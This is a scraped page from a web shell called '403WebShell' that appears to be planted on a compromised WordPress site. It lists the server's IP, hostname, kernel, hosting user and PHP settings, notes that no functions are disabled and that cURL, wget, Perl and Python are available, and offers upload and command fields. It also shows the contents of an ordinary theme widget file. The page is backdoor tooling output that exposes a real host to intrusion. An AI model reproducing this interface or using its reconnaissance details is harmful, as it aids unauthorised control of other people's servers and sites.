Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.139.80.194
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/cynthiaadediran.com/wp-content/themes/gerold/inc/common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/cynthiaadediran.com/wp-content/themes/gerold/inc/common/template-widgets.php
<?php

/**
 * Gerold Theme Widgets Register
 *
 * @package Gerold_Theme
 * @since Gerold 1.0.0
 * @author ThemeJunction 
 */

if (!defined('ABSPATH')) {
  exit;
}

/**
 *    ---------------------------------------------------------------------------------------
 *    Register widget area.
 *    ---------------------------------------------------------------------------------------
 */

// $footer_style_2_switch = get_theme_mod('footer_style_2_switch', false);

/**
 * blog sidebar
 */
register_sidebar([
  'name'          => esc_html__('Blog Sidebar', 'gerold'),
  'id'            => 'blog-sidebar',
  'before_widget' => '<div id="%1$s" class="tj-sidebar__widget sidebar_widget wow fadeInUp %2$s" data-wow-delay="0.3s">',
  'after_widget'  => '</div>',
  'before_title'  => '<div class="widget_title"><h3 class="title">',
  'after_title'   => '</h3></div>',
]);

$footer_columns = get_theme_mod('footer_widget_column', 4);
// footer default
for ($num = 1; $num <= $footer_columns; $num++) {
  register_sidebar([
    'name'          => sprintf(esc_html__('Footer Column %1$s', 'gerold'), $num),
    'id'            => 'footer-' . $num,
    'description'   => sprintf(esc_html__('This widget content will be show widget %1$s', 'gerold'), $num),
    'before_widget' => '<div id="%1$s" class="tj-footer__widget footer-column__' . $num . ' %2$s">',
    'after_widget'  => '</div>',
    'before_title'  => '<h5 class="widget_title">',
    'after_title'   => '</h5>',
  ]);
}

Youez - 2016 - github.com/yon3zu
LinuXploit